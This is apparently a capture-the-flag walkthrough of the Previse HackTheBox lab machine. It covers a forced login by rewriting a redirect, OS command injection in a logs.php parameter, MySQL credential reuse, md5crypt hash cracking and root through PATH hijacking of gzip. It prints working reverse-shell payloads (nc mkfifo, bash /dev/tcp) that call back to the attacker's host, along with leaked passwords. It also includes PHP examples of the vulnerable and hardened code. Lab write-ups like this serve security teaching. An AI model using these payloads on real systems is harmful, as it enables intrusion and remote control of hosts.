Previse HackTheBox WalkThrough
This is the Previse HackTheBox machine walkthrough. In this writeup, I have demonstrated step-by-step how I rooted the Previse HackTheBox machine. Before starting, let us know something about this box. It is a Linux OS box with IP address 10.10.11.104 and difficulty level Easy, assigned by its maker.
First of all, connect your PC to the HackTheBox VPN and confirm your connectivity with the Previse machine by pinging its IP 10.10.11.104. If all goes well, start hacking. As usual, I started by scanning the machine. Scanning gives us an idea of how to proceed further: it helps in banner grabbing the various services running over different ports, and sometimes it helps in vulnerability assessment too. I have used $ nmap [a popular port scanner] for this task and the result is given below:
Scanning
$ sudo nmap -sC -sV -sT -p- -oN full-tcp-port.nmap 10.10.11.104
The full port scan with nmap revealed many ports as open. We will focus mainly on ports 22 and 80, as the services running over them are well known. OpenSSH 7.6p1 is running on port 22 and the Apache2 web server is running on port 80. Since port 80 is open and a web server is running on it, there must be a website hosted there which can be accessed using the URL http://10.10.11.104. We will begin our enumeration from port 80. On going to the URL http://10.10.11.104 I found a login page as shown below.
I simply tried some default credentials like admin:admin, admin:password, previse:password and some more, but none of them worked. Then I tried some login-screen-bypass SQL payloads; they did not work either. I tried fuzzing with some malicious payloads to get a verbose error message, but again everything seemed to be configured properly. If I could get a username from anywhere, I would definitely perform a brute-force attack on this login page, since it has neither a captcha nor rate limiting implemented. Meanwhile, I started $ dirsearch in the background to find folders and files.
$ sudo dirsearch -u http://10.10.11.104/ -e all -x 402,401,403,404 -t 50
Dirsearch found many files, and on accessing most of the pages I was redirected to the login page. When I tried to access the accounts.php page through the URL http://10.10.11.104/accounts.php, it redirected me to login.php.
Forced Login into Previse
Then I went to the URL http://10.10.11.104/accounts.php, captured the request in Burp Suite and tried a forced login by changing the response to the login request. The captured request for the accounts.php file is shown in the screenshot below.
Right-click on the request and intercept the response to this request. Then replace 302 Found with 200 OK to force the application not to redirect to the login.php page, as shown in the screenshot given below.
After forwarding the request, it is observed that we are successfully logged in to the application.
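Why rewriting the 302 into a 200 exposed the page, as an added PHP illustration (this is not the Previse source code; the session key, file names and form field are assumptions about how such a page is typically written): the vulnerable pattern queues the Location header but never stops executing, so the protected page body is still written into the response, and a proxy that rewrites the status line simply gets to see it. The hardened form calls exit right after header(), so the guard holds no matter which status code the client chooses to honour.

```php
<?php
// Added illustration, not code from the Previse box. The session key,
// file names and form field are assumptions.

session_start();

// Vulnerable guard: the redirect header is queued, but execution continues
// into the page body. Everything echoed after this call still reaches the
// client, so an intercepting proxy that turns "302 Found" into "200 OK"
// (or any client that ignores Location) renders the protected content.
function vulnerable_guard(): void
{
    if (!isset($_SESSION['user'])) {
        header('Location: login.php');
        // missing: exit;
    }
}

// Hardened guard: terminate the script immediately after queuing the
// redirect, so the response body contains nothing protected. The server
// never relies on the client actually following the Location header.
function hardened_guard(): void
{
    if (!isset($_SESSION['user'])) {
        header('Location: login.php', true, 302);
        exit;
    }
}

// The same rule applies to state-changing handlers such as CREATE USER:
// authorise before acting. A guard without exit in front of this code is
// what lets a forced-login client register accounts.
function handle_create_user(array $post): void
{
    hardened_guard();                 // returns only for authenticated sessions
    if (($post['action'] ?? '') !== 'create') {
        return;
    }
    // ... create the account for $post['username'] here
}

hardened_guard();
handle_create_user($_POST);
?>
<!-- protected markup (the CREATE USER form, the file list, ...) is only
     reached by authenticated sessions -->
```

The status code is presentation, not authorisation: the only thing that reliably keeps the protected body out of the response is that the script stops before producing it.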
Once I was logged in to the application, I tried to add a new account by registering a new user. I entered the credentials test2:test2 and, after clicking on the CREATE USER button, again captured the request in Burp Suite and modified the response as we did in the steps above. Now we have successfully registered a user account with the credentials test2:test2.
Let us log in to the test2 user account. After logging in, I saw a file upload functionality, so I uploaded a simple txt file and tried to check whether we can execute it or not. When I accessed it, it immediately started downloading. If I could somehow execute it, my next step would be to upload a PHP web shell and get a reverse shell on my netcat listener. But here it is of no use.
There is a backup file present by the name SITEBACKUP.ZIP. After downloading and extracting this file, I found the credentials root:mySQL_p@ssw0rd!:) in the config.php file. Then I tried to SSH in as root, but these are not SSH credentials. I tried to use this password with other enumerated users like newguy, m4lwhere, admin, etc., but all were useless.
$ cat config.php
After reviewing the source code of all the files inside SITEBACKUP.ZIP, I found the file logs.php, which uses the dangerous PHP function exec(). This function accepts user input through the parameter delim without performing any input validation. Use of the exec() function without proper validation may lead to an OS command injection vulnerability. For more info about exec() check this documentation.
After some testing I found a blind OS command injection vulnerability in this file. Since the backup file was downloaded from this website, there is a good chance that the code running on the server is vulnerable to OS command injection too.
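What an unvalidated delim parameter looks like next to a fixed version, as an added PHP example (this is not the logs.php from SITEBACKUP.ZIP; the helper script path /opt/scripts/export_logs.py and the delimiter names are assumptions). The fix has two independent layers: the request value is only ever used as a key into an allowlist, and the helper is started without a shell at all.

```php
<?php
// Added example, not the logs.php from the Previse backup. The helper
// script path and the delimiter names are assumptions.

// Vulnerable: the request value is spliced into a shell command string.
// exec() hands that string to /bin/sh, so shell metacharacters in $delim
// (";", "|", "&&", "$(...)") end the intended command and start another.
function vulnerable_export(string $delim): array
{
    $lines = [];
    exec("/usr/bin/python3 /opt/scripts/export_logs.py {$delim}", $lines);
    return $lines;
}

// Hardened, layer 1: the parameter is a *name* looked up in a fixed table.
// The value that reaches the command never comes from the request.
const DELIMITERS = [
    'comma' => ',',
    'space' => ' ',
    'tab'   => "\t",
];

function resolve_delimiter(string $name): ?string
{
    return DELIMITERS[$name] ?? null;   // null for anything not allowlisted
}

// Hardened, layer 2: run the helper without a shell. With an array command,
// proc_open() passes each element as its own argv entry (PHP >= 7.4), so
// there is no shell parsing left to inject into.
function hardened_export(string $name): array
{
    $delim = resolve_delimiter($name);
    if ($delim === null) {
        http_response_code(400);
        return ['invalid delimiter'];
    }

    $descriptors = [1 => ['pipe', 'w'], 2 => ['pipe', 'w']];
    $proc = proc_open(
        ['/usr/bin/python3', '/opt/scripts/export_logs.py', $delim],
        $descriptors,
        $pipes
    );
    if (!is_resource($proc)) {
        return ['export failed'];
    }
    $out = stream_get_contents($pipes[1]);
    fclose($pipes[1]);
    fclose($pipes[2]);
    proc_close($proc);
    return explode("\n", rtrim($out, "\n"));
}

// Request handling: only the allowlisted name is ever read from the client,
// and the output is HTML-escaped on the way back out.
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    foreach (hardened_export((string)($_POST['delim'] ?? '')) as $line) {
        echo htmlspecialchars($line, ENT_QUOTES, 'UTF-8'), "\n";
    }
}
```

The allowlist alone already removes the injection, because the client-controlled string is only ever compared against known keys. Where a shell string genuinely cannot be avoided, escapeshellarg() on the resolved value is the fallback, not a substitute for the allowlist.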
Confirming OS Command Injection
To confirm the blind OS command injection vulnerability, we will inject a time-based OS command like $ ping in the Previse logs.php page and then capture the ping response using wireshark or $ tcpdump on our Kali machine.
$ sudo tcpdump -i tun0 icmp
We found that we can ping our Kali machine from the Previse machine. So we have successfully confirmed the blind OS command injection vulnerability using the time-delay technique. For more methods of exploiting OS command injection check this article from PortSwigger. Let us get a user shell by using a reverse shell one-liner. I am using the $ nc command to get the reverse shell; you can use any other as well. You can find a list of one-liners here.
Getting User Shell
To get a reverse shell, start a netcat listener on your Kali machine on port 9001 and put the following one-liner payload in the delim parameter.
;rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+10.10.16.10+9001+>/tmp/f
$ nc -nvlp 9001
$ whoami && id
We have successfully got a reverse shell as user www-data. Let us upgrade it to a fully interactive Linux shell so that we can run more advanced Linux commands through it.
Upgrading Shell
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
$ ^Z # To background
$ stty raw -echo
$ fg # To put foreground
$ export TERM=xterm
Checking Listening Ports
After some enumeration I found that port 3306 is listening locally. Port 3306 is the default port for the classic MySQL protocol, which is used by the MySQL client, MySQL Connectors, and utilities such as mysqldump and mysqlpump.
$ ss -lnpt
Since we have already found the database credentials inside the config.php file, I tried them to log in to the MySQL server using the $ mysql command.
$ mysql -u 'root' -p
~mySQL_p@ssw0rd!:)
mysql> show databases;
mysql> use previse;
mysql> show tables;
mysql> SELECT * FROM accounts;
mysql> exit
From the above we found the password hash of user m4lwhere.
m4lwhere:$1$🧂llol$DQpmdvnb7EeuO6UaqRItf.
Identify the Hash
Before we proceed to crack this hash, we need to identify its type. Let us identify the type of hash and then crack it to get the password. The hash appears to be of the form md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5), which can be confirmed from the example below.
$ hashcat --example-hashes | grep -A2 -i 'MODE: 500'
For cracking the hash, I have used $ hashcat (a well-known offline password cracker) with the wordlist rockyou.txt (rockyou.txt is already present in Kali and Parrot OS inside the directory /usr/share/wordlists/).
Cracking Hash
$ cat hash.txt
$ hashcat -m 500 -a 0 hash.txt /usr/share/wordlists/rockyou.txt # -m 500 = md5crypt, -a 0 = straight (wordlist) attack
$ hashcat -m 500 -a 0 hash.txt /usr/share/wordlists/rockyou.txt --show
-----SNIP-----
The cracked password for the user m4lwhere is ilovecody112235!.
Let us SSH into the m4lwhere account.
$ ssh m4lwhere@10.10.11.104
~ilovecody112235!
We are successfully logged in as m4lwhere. Let us capture the user flag.
Capture User Flag
$ cat user.txt
Privilege Escalation
To escalate privileges to root we first have to find a privilege escalation vector using which we can perform the escalation. We can find the PrivEsc vector either manually or using post-exploitation enumeration scripts like linpeas.sh, LinEnum.sh and many more. This time I will go with manual enumeration.
Finding PrivEsc Vector
The $ sudo -l command revealed that user m4lwhere can run the script access_backup.sh with root privileges.
$ sudo -l
~ilovecody112235!
On analyzing the content of the access_backup.sh file, I found that the $ gzip command is not invoked with an absolute path. This introduces a path hijacking vulnerability here. For more info about privilege escalation using the PATH variable check this article.
$ cat /opt/scripts/access_backup.sh
When I tried to escalate privileges using the PATH variable, I could easily do so. So here our potential PrivEsc vector is privilege escalation via path hijacking.
Getting Root Shell
To get the root shell I ran the following commands.
On Previse Machine
$ echo $PATH
$ echo '#!/bin/bash' > /tmp/gzip
$ echo 'bash -i >& /dev/tcp/10.10.17.97/9001 0>&1' >> /tmp/gzip
$ cat /tmp/gzip
$ chmod +x /tmp/gzip
$ export PATH=/tmp:$PATH
$ echo $PATH
$ sudo /opt/scripts/access_backup.sh
On Kali Machine
$ nc -nvlp 9001
# whoami && id
We are root now. Let us capture the root flag.
Capture Root Flag
# cat /root/root.txt
This was how I rooted the Previse HackTheBox machine. I learnt a lot from this challenge; I hope you have also learnt some new things. Thanks for reading this article. For any query or suggestion about the walkthrough, feel free to write to us at [email protected].